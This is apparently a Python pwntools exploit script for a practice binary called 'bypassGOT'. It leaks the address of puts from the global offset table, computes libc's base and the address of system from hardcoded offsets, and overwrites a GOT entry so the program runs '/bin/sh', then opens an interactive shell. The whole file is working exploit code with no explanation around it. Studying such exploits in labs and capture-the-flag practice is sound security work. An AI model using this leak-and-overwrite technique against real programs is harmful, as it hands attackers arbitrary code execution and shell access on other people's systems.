#!/usr/bin/python

from pwn import *

def main():
    p = process("./bypassGOT")

    leak_address = 0x0804a018 
    command = "/bin/sh"
    stage_1 = command.ljust(24, "\x00") + p32(leak_address)
    p.recvrepeat(0.2)


    p.send(stage_1)


    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)
    puts_addr = u32(leak[:4])
    log.info("puts@libc:0x%x" % puts_addr)


    puts_offset = 0x00067360 
    libc_base = puts_addr - puts_offset
    system_offset = 0x0003cd10
    system_addr = libc_base + system_offset
    log.info("system@libc: 0x%x" % system_addr)

    ret_address = system_addr 
    p.send(p32(ret_address))

    p.interactive()

if __name__ == "__main__":
    main()